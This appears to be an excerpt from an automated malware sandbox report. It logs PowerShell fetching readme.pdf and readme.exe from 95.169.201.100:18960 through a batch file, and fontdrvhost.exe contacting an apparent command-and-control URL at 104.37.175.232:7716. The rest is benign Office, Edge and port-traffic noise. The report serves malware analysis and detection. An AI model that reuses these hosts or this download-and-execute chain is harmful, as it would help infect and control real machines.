                      Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                      Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /uploads/team-1/readme.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 95.169.201.100:18960
                      Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                      Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                      Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: chrome.cloudflare-dns.comConnection: keep-aliveContent-Length: 128Accept: application/dns-messageAccept-Language: *User-Agent: ChromeAccept-Encoding: identityContent-Type: application/dns-message
                      Source: readme.exe, 00000013.00000002.1650378613.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000013.00000000.1437712543.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drString found in binary or memory: http://%shttp://a.SharedObject.BadPersistencependingSharedObject.UriMismatch
                      Source: readme.exe, 00000013.00000002.1650378613.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000013.00000000.1437712543.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drString found in binary or memory: http://.macromedia.com/support/flashplayer/sys/https://SettingsSubdomainmms.cfgdefaultAuthorLocalSec
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93A145000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.1
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D9399A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456571632.000001D939CBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://95.169.201.100:18960
                      Source: powershell.exe, 00000003.00000002.1455526509.000001D9377E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456571632.000001D939CBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1504226670.000001D951B98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1497496875.000001D951802000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456201169.000001D937B10000.00000004.00000020.00020000.00000000.sdmp, 098aPtSbmd.batString found in binary or memory: http://95.169.201.100:18960/uploads/team-1/readme.exe
                      Source: powershell.exe, 00000003.00000002.1455526509.000001D9377E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1504226670.000001D951B98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456201169.000001D937B10000.00000004.00000020.00020000.00000000.sdmp, 098aPtSbmd.batString found in binary or memory: http://95.169.201.100:18960/uploads/team-1/readme.pdf
                      Source: svchost.exe, 0000000C.00000002.2513604972.000001F2BA800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000000C.00000003.1356786912.000001F2BA590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93A14D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: powershell.exe, 00000003.00000002.1489711504.000001D9497EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://permanently-removed.invalid/
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://permanently-removed.invalid/v1/accountcapabilities:batchGet
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D9399A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D939B14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D939781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D939B14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D9399A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: readme.exe, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000002.1633198589.0000000000628000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drString found in binary or memory: http://www.macromedia.com
                      Source: readme.exe, 00000013.00000002.1650378613.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000013.00000000.1437712543.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drString found in binary or memory: http://www.macromedia.comhttps://www.macromedia.com/support/flashplayer/sys/&amp
                      Source: powershell.exe, 00000003.00000002.1499261908.000001D951A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                      Source: powershell.exe, 00000003.00000002.1503556073.000001D951AD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.T
                      Source: fontdrvhost.exe, fontdrvhost.exe, 0000001C.00000002.2033082515.00000205BFC30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihus
                      Source: fontdrvhost.exe, 00000018.00000003.1730115092.0000000005274000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001C.00000002.2033082515.00000205BFC30000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihuskernelbasentdllkernel32GetProcessMitig
                      Source: fontdrvhost.exe, 00000018.00000002.1730989811.000000000076C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://104.37.175.232:7716/a77586b5414f862b919/3o3m5nij.fihusx
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D939781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D939B14000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93AB30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456571632.000001D93B650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456571632.000001D93B676000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
                      Source: msedge.exe, 0000000B.00000002.1368552278.000002584E91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                      Source: msedge.exe, 0000000B.00000002.1382407088.000062F4003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://azureedge.net/
                      Source: msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net/
                      Source: msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.edog.designerapp.osi.office.net/
                      Source: msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.int.designerapp.osi.office.net/
                      Source: msedge.exe, 0000000B.00000002.1381041216.000062F40001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                      Source: msedge.exe, 0000000B.00000002.1382476279.000062F4003E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                      Source: msedge.exe, 0000000B.00000002.1381041216.000062F40001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
                      Source: msedge.exe, 0000000B.00000002.1381128793.000062F400040000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                      Source: fontdrvhost.exe, 00000018.00000003.1658637494.0000000005271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-query
                      Source: fontdrvhost.exe, 00000018.00000003.1658637494.0000000005271000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi
                      Source: powershell.exe, 00000003.00000002.1489711504.000001D9497EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000003.00000002.1489711504.000001D9497EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000003.00000002.1489711504.000001D9497EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp-dogfood.azurewebsites.net/
                      Source: msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp-int.azurewebsites.net/
                      Source: msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp.azurewebsites.net/
                      Source: msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://designerapp.azurewebsites.net/net//
                      Source: svchost.exe, 0000000C.00000003.1356786912.000001F2BA5E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                      Source: svchost.exe, 0000000C.00000003.1356786912.000001F2BA590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D9399A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000003.00000002.1456571632.000001D93AB30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1456571632.000001D93A14D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: msedge.exe, 0000000B.00000002.1382407088.000062F4003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                      Source: msedge.exe, 0000000B.00000002.1382407088.000062F4003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                      Source: msedge.exe, 0000000B.00000002.1382407088.000062F4003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                      Source: powershell.exe, 00000003.00000002.1489711504.000001D9497EE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: msedge.exe, 0000000B.00000002.1382407088.000062F4003A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                      Source: msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/GetCheckConnectionInfo
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/ListAccounts?json=standard
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                      Source: msedge.exe, 0000000B.00000002.1382476279.000062F4003E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/devicemanagement/data/api
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/reauth/chromeos
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/chrome/usermenu
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/kidsignin/chromeos
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/kidsignup/chromeos
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/v2/chromeos
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/setup/windows
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/embedded/xreauth/chrome
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/encryption/unlock/desktop
                      Source: msedge.exe, 0000000B.00000002.1381291542.000062F400064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                      Source: msedge.exe, 0000000B.00000002.1381490470.000062F400098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/signin/chrome/sync?ssp=1
                      Source: msedge.exe, 0000000B.00000002.1382169258.000062F400258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/events
                      Source: msedge.exe, 0000000B.00000002.1382189702.000062F40026C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                      Source: msedge.exe, 0000000B.00000002.1382105334.000062F4001DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/x
                      Source: readme.exe, 00000013.00000002.1650378613.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, readme.exe, 00000013.00000002.1648148817.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000013.00000000.1437712543.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drString found in binary or memory: https://www.macromedia.com/bin/flashdownload.cgi
                      Source: readme.exe, readme.exe, 00000017.00000002.1632907694.000000000053D000.00000002.00000001.01000000.0000000E.sdmp, readme.exe.3.drString found in binary or memory: https://www.macromedia.com/support/flashplayer/sys/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
